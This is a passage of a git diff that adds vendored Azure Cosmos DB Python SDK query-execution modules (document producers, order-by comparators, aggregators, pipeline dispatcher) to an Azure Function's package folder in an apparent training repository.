obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for document producer implementation in the Azure Cosmos +database service. +""" + +import numbers +from collections import deque + +from azure.cosmos import _base +from azure.cosmos._execution_context.aio.base_execution_context import _DefaultQueryExecutionContext + + +class _DocumentProducer(object): + """This class takes care of handling of the results for one single partition + key range. + + When handling an orderby query, MultiExecutionContextAggregator instantiates + one instance of this class per target partition key range and aggregates the + result of each. + """ + + def __init__(self, partition_key_target_range, client, collection_link, query, document_producer_comp, options): + """ + Constructor + """ + self._options = options + self._partition_key_target_range = partition_key_target_range + self._doc_producer_comp = document_producer_comp + self._client = client + self._buffer = deque() + + self._is_finished = False + self._has_started = False + self._cur_item = None + # initiate execution context + + path = _base.GetPathFromLink(collection_link, "docs") + collection_id = _base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return await self._client.QueryFeed(path, collection_id, query, options, partition_key_target_range["id"]) + + self._ex_context = _DefaultQueryExecutionContext(client, self._options, fetch_fn) + + async def __aiter__(self): + return self + + async def __anext__(self): + """ + :return: The next result item. + :rtype: dict + :raises StopIteration: If there is no more result. + + """ + if self._cur_item is not None: + res = self._cur_item + self._cur_item = None + return res + + return await self._ex_context.__anext__() + + def get_target_range(self): + """Returns the target partition key range. + :return: + Target partition key range. + :rtype: dict + """ + return self._partition_key_target_range + + async def peek(self): + """ + TODO: use more_itertools.peekable instead + :return: The current result item. + :rtype: dict. + :raises StopIteration: If there is no current item. + + """ + if self._cur_item is None: + self._cur_item = await self._ex_context.__anext__() + + return self._cur_item + + +def _compare_helper(a, b): + if a is None and b is None: + return 0 + return (a > b) - (a < b) + + +class _PartitionKeyRangeDocumentProducerComparator(object): + """ + Provides a Comparator for document producers using the min value of the + corresponding target partition. + """ + + def __init__(self): + pass + + async def compare(self, doc_producer1, doc_producer2): # pylint: disable=no-self-use + return _compare_helper( + doc_producer1.get_target_range()["minInclusive"], doc_producer2.get_target_range()["minInclusive"] + ) + + +class _OrderByHelper(object): + + @staticmethod + def getTypeOrd(orderby_item): + """Returns the ordinal of the value of the item pair in the dictionary. + + :param dict orderby_item: + + :return: + 0 if the item_pair doesn't have any 'item' key + 1 if the value is undefined + 2 if the value is a boolean + 4 if the value is a number + 5 if the value is a str or a unicode + :rtype: int + """ + if "item" not in orderby_item: + return 0 + val = orderby_item["item"] + if val is None: + return 1 + if isinstance(val, bool): + return 2 + if isinstance(val, numbers.Number): + return 4 + if isinstance(val, str): + return 5 + + raise TypeError("unknown type" + str(val)) + + @staticmethod + def getTypeStr(orderby_item): + """Returns the string representation of the type + + :param dict orderby_item: + :return: String representation of the type + :rtype: str + """ + if "item" not in orderby_item: + return "NoValue" + val = orderby_item["item"] + if val is None: + return "Null" + if isinstance(val, bool): + return "Boolean" + if isinstance(val, numbers.Number): + return "Number" + if isinstance(val, str): + return "String" + + raise TypeError("unknown type" + str(val)) + + @staticmethod + async def compare(orderby_item1, orderby_item2): + """Compare two orderby item pairs. + + :param dict orderby_item1: + :param dict orderby_item2: + :return: + Integer comparison result. + The comparator acts such that + - if the types are different we get: + Undefined value < Null < booleans < Numbers < Strings + - if both arguments are of the same type: + it simply compares the values. + :rtype: int + """ + + type1_ord = _OrderByHelper.getTypeOrd(orderby_item1) + type2_ord = _OrderByHelper.getTypeOrd(orderby_item2) + + type_ord_diff = type1_ord - type2_ord + + if type_ord_diff: + return type_ord_diff + + # the same type, + if type1_ord == 0: + return 0 + + return _compare_helper(orderby_item1["item"], orderby_item2["item"]) + + +def _peek_order_by_items(peek_result): + return peek_result["orderByItems"] + + +class _OrderByDocumentProducerComparator(_PartitionKeyRangeDocumentProducerComparator): + """Provide a Comparator for document producers which respects orderby sort order. + """ + + def __init__(self, sort_order): # pylint: disable=super-init-not-called + """Instantiates this class + + :param list sort_order: + List of sort orders (i.e., Ascending, Descending) + + :ivar list sort_order: + List of sort orders (i.e., Ascending, Descending) + + """ + self._sort_order = sort_order + + async def compare(self, doc_producer1, doc_producer2): + """Compares the given two instances of DocumentProducers. + + Based on the orderby query items and whether the sort order is Ascending + or Descending compares the peek result of the two DocumentProducers. + + If the peek results are equal based on the sort order, this comparator + compares the target partition key range of the two DocumentProducers. + + :param _DocumentProducer doc_producer1: first instance + :param _DocumentProducer doc_producer2: first instance + :return: + Integer value of compare result. + positive integer if doc_producer1 > doc_producer2 + negative integer if doc_producer1 < doc_producer2 + :rtype: int + """ + + res1 = _peek_order_by_items(await doc_producer1.peek()) + res2 = _peek_order_by_items(await doc_producer2.peek()) + + self._validate_orderby_items(res1, res2) + + for i, (elt1, elt2) in enumerate(zip(res1, res2)): + res = await _OrderByHelper.compare(elt1, elt2) + if res != 0: + if self._sort_order[i] == "Ascending": + return res + if self._sort_order[i] == "Descending": + return -res + + return await _PartitionKeyRangeDocumentProducerComparator.compare(self, doc_producer1, doc_producer2) + + def _validate_orderby_items(self, res1, res2): + if len(res1) != len(res2): + # error + raise ValueError("orderByItems cannot have different size") + + if len(res1) != len(self._sort_order): + # error + raise ValueError("orderByItems cannot have a different size than sort orders.") + + for elt1, elt2 in zip(res1, res2): + type1 = _OrderByHelper.getTypeStr(elt1) + type2 = _OrderByHelper.getTypeStr(elt2) + if type1 != type2: + raise ValueError("Expected {}, but got {}.".format(type1, type2)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/endpoint_component.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/endpoint_component.py new file mode 100644 index 0000000..0dc6c30 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/endpoint_component.py @@ -0,0 +1,194 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for query execution endpoint component implementation in the +Azure Cosmos database service. +""" +import numbers +import copy +import hashlib +import json + +from azure.cosmos._execution_context.aggregators import ( + _AverageAggregator, + _CountAggregator, + _MaxAggregator, + _MinAggregator, + _SumAggregator, +) + + +class _QueryExecutionEndpointComponent(object): + def __init__(self, execution_context): + self._execution_context = execution_context + + async def __aiter__(self): + return self + + async def __anext__(self): + # supports python 3 iterator + return await self._execution_context.__anext__() + + +class _QueryExecutionOrderByEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling an order by query. + + For each processed orderby result it returns 'payload' item of the result. + """ + async def __anext__(self): + payload = await self._execution_context.__anext__() + return payload["payload"] + + +class _QueryExecutionTopEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling top query. + + It only returns as many results as top arg specified. + """ + + def __init__(self, execution_context, top_count): + super(_QueryExecutionTopEndpointComponent, self).__init__(execution_context) + self._top_count = top_count + + async def __anext__(self): + if self._top_count > 0: + res = await self._execution_context.__anext__() + self._top_count -= 1 + return res + raise StopAsyncIteration + + +class _QueryExecutionDistinctOrderedEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling distinct query. + + It returns only those values not already returned. + """ + def __init__(self, execution_context): + super(_QueryExecutionDistinctOrderedEndpointComponent, self).__init__(execution_context) + self.last_result = None + + async def __anext__(self): + res = await self._execution_context.__anext__() + while self.last_result == res: + res = await self._execution_context.__anext__() + self.last_result = res + return res + + +class _QueryExecutionDistinctUnorderedEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling distinct query. + + It returns only those values not already returned. + """ + def __init__(self, execution_context): + super(_QueryExecutionDistinctUnorderedEndpointComponent, self).__init__(execution_context) + self.last_result = set() + + def make_hash(self, value): + if isinstance(value, (set, tuple, list)): + return tuple([self.make_hash(v) for v in value]) + if not isinstance(value, dict): + if isinstance(value, numbers.Number): + return float(value) + return value + new_value = copy.deepcopy(value) + for k, v in new_value.items(): + new_value[k] = self.make_hash(v) + + return tuple(frozenset(sorted(new_value.items()))) + + async def __anext__(self): + res = await self._execution_context.__anext__() + + json_repr = json.dumps(self.make_hash(res)).encode("utf-8") + + hash_object = hashlib.sha1(json_repr) # nosec + hashed_result = hash_object.hexdigest() + + while hashed_result in self.last_result: + res = await self._execution_context.__anext__() + json_repr = json.dumps(self.make_hash(res)).encode("utf-8") + + hash_object = hashlib.sha1(json_repr) # nosec + hashed_result = hash_object.hexdigest() + self.last_result.add(hashed_result) + return res + + +class _QueryExecutionOffsetEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling offset query. + + It returns results offset by as many results as offset arg specified. + """ + def __init__(self, execution_context, offset_count): + super(_QueryExecutionOffsetEndpointComponent, self).__init__(execution_context) + self._offset_count = offset_count + + async def __anext__(self): + while self._offset_count > 0: + res = await self._execution_context.__anext__() + if res is not None: + self._offset_count -= 1 + else: + raise StopAsyncIteration + return await self._execution_context.__anext__() + + +class _QueryExecutionAggregateEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling aggregate query. + + It returns only aggreated values. + """ + + def __init__(self, execution_context, aggregate_operators): + super(_QueryExecutionAggregateEndpointComponent, self).__init__(execution_context) + self._local_aggregators = [] + self._results = None + self._result_index = 0 + for operator in aggregate_operators: + if operator == "Average": + self._local_aggregators.append(_AverageAggregator()) + elif operator == "Count": + self._local_aggregators.append(_CountAggregator()) + elif operator == "Max": + self._local_aggregators.append(_MaxAggregator()) + elif operator == "Min": + self._local_aggregators.append(_MinAggregator()) + elif operator == "Sum": + self._local_aggregators.append(_SumAggregator()) + + async def __anext__(self): + async for res in self._execution_context: + for item in res: #TODO check on this being an async loop + for operator in self._local_aggregators: + if isinstance(item, dict) and item: + operator.aggregate(item["item"]) + elif isinstance(item, numbers.Number): + operator.aggregate(item) + if self._results is None: + self._results = [] + for operator in self._local_aggregators: + self._results.append(operator.get_result()) + if self._result_index < len(self._results): + res = self._results[self._result_index] + self._result_index += 1 + return res + raise StopAsyncIteration diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/execution_dispatcher.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/execution_dispatcher.py new file mode 100644 index 0000000..ef8e6fa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/execution_dispatcher.py @@ -0,0 +1,192 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for proxy query execution context implementation in the Azure +Cosmos database service. +""" + +from azure.cosmos._execution_context.aio import endpoint_component +from azure.cosmos._execution_context.aio import multi_execution_aggregator +from azure.cosmos._execution_context.aio.base_execution_context import _QueryExecutionContextBase +from azure.cosmos._execution_context.aio.base_execution_context import _DefaultQueryExecutionContext +from azure.cosmos._execution_context.execution_dispatcher import _is_partitioned_execution_info +from azure.cosmos._execution_context.query_execution_info import _PartitionedQueryExecutionInfo +from azure.cosmos.documents import _DistinctType +from azure.cosmos.exceptions import CosmosHttpResponseError +from azure.cosmos.http_constants import StatusCodes + +# pylint: disable=protected-access + +class _ProxyQueryExecutionContext(_QueryExecutionContextBase): # pylint: disable=abstract-method + """Represents a proxy execution context wrapper. + + By default, uses _DefaultQueryExecutionContext. + + If backend responds a 400 error code with a Query Execution Info, switches + to _MultiExecutionContextAggregator + """ + + def __init__(self, client, resource_link, query, options, fetch_function): + """ + Constructor + """ + super(_ProxyQueryExecutionContext, self).__init__(client, options) + + self._execution_context = _DefaultQueryExecutionContext(client, options, fetch_function) + self._resource_link = resource_link + self._query = query + self._fetch_function = fetch_function + + async def __anext__(self): + """Returns the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + + """ + try: + return await self._execution_context.__anext__() + except CosmosHttpResponseError as e: + if _is_partitioned_execution_info(e): + query_to_use = self._query if self._query is not None else "Select * from root r" + query_execution_info = _PartitionedQueryExecutionInfo(await self._client._GetQueryPlanThroughGateway + (query_to_use, self._resource_link)) + self._execution_context = await self._create_pipelined_execution_context(query_execution_info) + else: + raise e + + return await self._execution_context.__anext__() + + async def fetch_next_block(self): + """Returns a block of results. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + try: + return await self._execution_context.fetch_next_block() + except CosmosHttpResponseError as e: + if _is_partitioned_execution_info(e): #cross partition query not servable + query_to_use = self._query if self._query is not None else "Select * from root r" + query_execution_info = _PartitionedQueryExecutionInfo(await self._client._GetQueryPlanThroughGateway + (query_to_use, self._resource_link)) + self._execution_context = await self._create_pipelined_execution_context(query_execution_info) + else: + raise e + + return await self._execution_context.fetch_next_block() + + async def _create_pipelined_execution_context(self, query_execution_info): + + assert self._resource_link, "code bug, resource_link is required." + if query_execution_info.has_aggregates() and not query_execution_info.has_select_value(): + if self._options and ("enableCrossPartitionQuery" in self._options + and self._options["enableCrossPartitionQuery"]): + raise CosmosHttpResponseError(StatusCodes.BAD_REQUEST, + "Cross partition query only supports 'VALUE ' for aggregates") + + execution_context_aggregator = multi_execution_aggregator._MultiExecutionContextAggregator(self._client, + self._resource_link, + self._query, + self._options, + query_execution_info) + await execution_context_aggregator._configure_partition_ranges() + return _PipelineExecutionContext(self._client, self._options, execution_context_aggregator, + query_execution_info) + + +class _PipelineExecutionContext(_QueryExecutionContextBase): # pylint: disable=abstract-method + + DEFAULT_PAGE_SIZE = 1000 + + def __init__(self, client, options, execution_context, query_execution_info): + super(_PipelineExecutionContext, self).__init__(client, options) + + if options.get("maxItemCount"): + self._page_size = options["maxItemCount"] + else: + self._page_size = _PipelineExecutionContext.DEFAULT_PAGE_SIZE + + self._execution_context = execution_context + + self._endpoint = endpoint_component._QueryExecutionEndpointComponent(execution_context) + + order_by = query_execution_info.get_order_by() + if order_by: + self._endpoint = endpoint_component._QueryExecutionOrderByEndpointComponent(self._endpoint) + + aggregates = query_execution_info.get_aggregates() + if aggregates: + self._endpoint = endpoint_component._QueryExecutionAggregateEndpointComponent(self._endpoint, aggregates) + + offset = query_execution_info.get_offset() + if offset is not None: + self._endpoint = endpoint_component._QueryExecutionOffsetEndpointComponent(self._endpoint, offset) + + top = query_execution_info.get_top() + if top is not None: + self._endpoint = endpoint_component._QueryExecutionTopEndpointComponent(self._endpoint, top) + + limit = query_execution_info.get_limit() + if limit is not None: + self._endpoint = endpoint_component._QueryExecutionTopEndpointComponent(self._endpoint, limit) + + distinct_type = query_execution_info.get_distinct_type() + if distinct_type != _DistinctType.NoneType: + if distinct_type == _DistinctType.Ordered: + self._endpoint = endpoint_component._QueryExecutionDistinctOrderedEndpointComponent(self._endpoint) + else: + self._endpoint = endpoint_component._QueryExecutionDistinctUnorderedEndpointComponent(self._endpoint) + + async def __anext__(self): + """Returns the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + return await self._endpoint.__anext__() + + async def fetch_next_block(self): + """Returns a block of results. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + This method internally invokes next() as many times required to collect + the requested fetch size. + + :return: List of results. + :rtype: list + """ + + results = [] + for _ in range(self._page_size): + try: + results.append(await self.__anext__()) + except StopAsyncIteration: + # no more results + break + return results diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/multi_execution_aggregator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/multi_execution_aggregator.py new file mode 100644 index 0000000..8284079 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/multi_execution_aggregator.py @@ -0,0 +1,193 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for multi execution context aggregator implementation in the Azure Cosmos database service. +""" + +from azure.cosmos._execution_context.aio.base_execution_context import _QueryExecutionContextBase +from azure.cosmos._execution_context.aio import document_producer, _queue_async_helper +from azure.cosmos._routing import routing_range +from azure.cosmos import exceptions + +# pylint: disable=protected-access + + +class _MultiExecutionContextAggregator(_QueryExecutionContextBase): + """This class is capable of queries which requires rewriting based on + backend's returned query execution info. + + This class maintains the execution context for each partition key range + and aggregates the corresponding results from each execution context. + + When handling an orderby query, _MultiExecutionContextAggregator + instantiates one instance of DocumentProducer per target partition key range + and aggregates the result of each. + """ + + # TODO improvement: this class needs to be parallelized + + class PriorityQueue: + """Provides a Priority Queue abstraction data structure""" + + def __init__(self): + self._heap = [] + + async def pop_async(self, document_producer_comparator): + return await _queue_async_helper.heap_pop(self._heap, document_producer_comparator) + + async def push_async(self, item, document_producer_comparator): + await _queue_async_helper.heap_push(self._heap, item, document_producer_comparator) + + def peek(self): + return self._heap[0] + + def size(self): + return len(self._heap) + + def __init__(self, client, resource_link, query, options, partitioned_query_ex_info): + super(_MultiExecutionContextAggregator, self).__init__(client, options) + + # use the routing provider in the client + self._routing_provider = client._routing_map_provider + self._client = client + self._resource_link = resource_link + self._query = query + self._partitioned_query_ex_info = partitioned_query_ex_info + self._sort_orders = partitioned_query_ex_info.get_order_by() + + if self._sort_orders: + self._document_producer_comparator = document_producer._OrderByDocumentProducerComparator(self._sort_orders) + else: + self._document_producer_comparator = document_producer._PartitionKeyRangeDocumentProducerComparator() + + self._orderByPQ = _MultiExecutionContextAggregator.PriorityQueue() + + async def __anext__(self): + """Returns the next result + + :return: The next result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + if self._orderByPQ.size() > 0: + + targetRangeExContext = await self._orderByPQ.pop_async(self._document_producer_comparator) + res = await targetRangeExContext.__anext__() + + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + await targetRangeExContext.peek() + await self._orderByPQ.push_async(targetRangeExContext, self._document_producer_comparator) + + except StopAsyncIteration: + pass + + return res + raise StopAsyncIteration + + async def fetch_next_block(self): + + raise NotImplementedError("You should use pipeline's fetch_next_block.") + + async def _repair_document_producer(self): + """Repairs the document producer context by using the re-initialized routing map provider in the client, + which loads in a refreshed partition key range cache to re-create the partition key ranges. + After loading this new cache, the document producers get re-created with the new valid ranges. + """ + # refresh the routing provider to get the newly initialized one post-refresh + self._routing_provider = self._client._routing_map_provider + # will be a list of (partition_min, partition_max) tuples + targetPartitionRanges = await self._get_target_partition_key_range() + + targetPartitionQueryExecutionContextList = [] + for partitionTargetRange in targetPartitionRanges: + # create and add the child execution context for the target range + targetPartitionQueryExecutionContextList.append( + self._createTargetPartitionQueryExecutionContext(partitionTargetRange) + ) + + for targetQueryExContext in targetPartitionQueryExecutionContextList: + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + await targetQueryExContext.peek() + # if there are matching results in the target ex range add it to the priority queue + await self._orderByPQ.push_async(targetQueryExContext, self._document_producer_comparator) + + except StopAsyncIteration: + continue + + def _createTargetPartitionQueryExecutionContext(self, partition_key_target_range): + + rewritten_query = self._partitioned_query_ex_info.get_rewritten_query() + if rewritten_query: + if isinstance(self._query, dict): + # this is a parameterized query, collect all the parameters + query = dict(self._query) + query["query"] = rewritten_query + else: + query = rewritten_query + else: + query = self._query + + return document_producer._DocumentProducer( + partition_key_target_range, + self._client, + self._resource_link, + query, + self._document_producer_comparator, + self._options, + ) + + async def _get_target_partition_key_range(self): + + query_ranges = self._partitioned_query_ex_info.get_query_ranges() + return await self._routing_provider.get_overlapping_ranges( + self._resource_link, [routing_range.Range.ParseFromDict(range_as_dict) for range_as_dict in query_ranges] + ) + + async def _configure_partition_ranges(self): + # will be a list of (partition_min, partition_max) tuples + targetPartitionRanges = await self._get_target_partition_key_range() + + targetPartitionQueryExecutionContextList = [] + for partitionTargetRange in targetPartitionRanges: + # create and add the child execution context for the target range + targetPartitionQueryExecutionContextList.append( + self._createTargetPartitionQueryExecutionContext(partitionTargetRange) + ) + + for targetQueryExContext in targetPartitionQueryExecutionContextList: + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + await targetQueryExContext.peek() + # if there are matching results in the target ex range add it to the priority queue + + await self._orderByPQ.push_async(targetQueryExContext, self._document_producer_comparator) + + except exceptions.CosmosHttpResponseError as e: + if exceptions._partition_range_is_gone(e): + # repairing document producer context on partition split + await self._repair_document_producer() + else: + raise + + except StopAsyncIteration: + continue diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/base_execution_context.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/base_execution_context.py new file mode 100644 index 0000000..af38ce8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/base_execution_context.py @@ -0,0 +1,170 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for query execution context implementation in the Azure Cosmos +database service. +""" + +from collections import deque +import copy +from .. import _retry_utility, http_constants + +# pylint: disable=protected-access + + +class _QueryExecutionContextBase(object): + """ + This is the abstract base execution context class. + """ + + def __init__(self, client, options): + """ + :param CosmosClient client: + :param dict options: The request options for the request. + """ + self._client = client + self._options = options + self._is_change_feed = "changeFeed" in options and options["changeFeed"] is True + self._continuation = self._get_initial_continuation() + self._has_started = False + self._has_finished = False + self._buffer = deque() + + def _get_initial_continuation(self): + if "continuation" in self._options: + if "enableCrossPartitionQuery" in self._options: + raise ValueError("continuation tokens are not supported for cross-partition queries.") + return self._options["continuation"] + return None + + def _has_more_pages(self): + return not self._has_started or self._continuation + + def fetch_next_block(self): + """Returns a block of results with respecting retry policy. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + if not self._has_more_pages(): + return [] + + if self._buffer: + # if there is anything in the buffer returns that + res = list(self._buffer) + self._buffer.clear() + return res + + # fetches the next block + return self._fetch_next_block() + + def _fetch_next_block(self): + raise NotImplementedError + + def __iter__(self): + """Returns itself as an iterator""" + return self + + def __next__(self): + """Return the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + if self._has_finished: + raise StopIteration + + if not self._buffer: + + results = self.fetch_next_block() + self._buffer.extend(results) + + if not self._buffer: + raise StopIteration + + return self._buffer.popleft() + + def _fetch_items_helper_no_retries(self, fetch_function): + """Fetches more items and doesn't retry on failure + + :return: List of fetched items. + :rtype: list + """ + fetched_items = [] + # Continues pages till finds a non empty page or all results are exhausted + while self._continuation or not self._has_started: + if not self._has_started: + self._has_started = True + new_options = copy.deepcopy(self._options) + new_options["continuation"] = self._continuation + + (fetched_items, response_headers) = fetch_function(new_options) + continuation_key = http_constants.HttpHeaders.Continuation + # Use Etag as continuation token for change feed queries. + if self._is_change_feed: + continuation_key = http_constants.HttpHeaders.ETag + # In change feed queries, the continuation token is always populated. The hasNext() test is whether + # there is any items in the response or not. + if not self._is_change_feed or fetched_items: + self._continuation = response_headers.get(continuation_key) + else: + self._continuation = None + if fetched_items: + break + return fetched_items + + def _fetch_items_helper_with_retries(self, fetch_function): + def callback(): + return self._fetch_items_helper_no_retries(fetch_function) + + return _retry_utility.Execute(self._client, self._client._global_endpoint_manager, callback) + + next = __next__ # Python 2 compatibility. + + +class _DefaultQueryExecutionContext(_QueryExecutionContextBase): + """ + This is the default execution context. + """ + + def __init__(self, client, options, fetch_function): + """ + :param CosmosClient client: + :param dict options: The request options for the request. + :param method fetch_function: + Will be invoked for retrieving each page + + Example of `fetch_function`: + + >>> def result_fn(result): + >>> return result['Databases'] + + """ + super(_DefaultQueryExecutionContext, self).__init__(client, options) + self._fetch_function = fetch_function + + def _fetch_next_block(self): + while super(_DefaultQueryExecutionContext, self)._has_more_pages() and not self._buffer: + return self._fetch_items_helper_with_retries(self._fetch_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/document_producer.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/document_producer.py new file mode 100644 index 0000000..a1e676c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/document_producer.py @@ -0,0 +1,279 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER 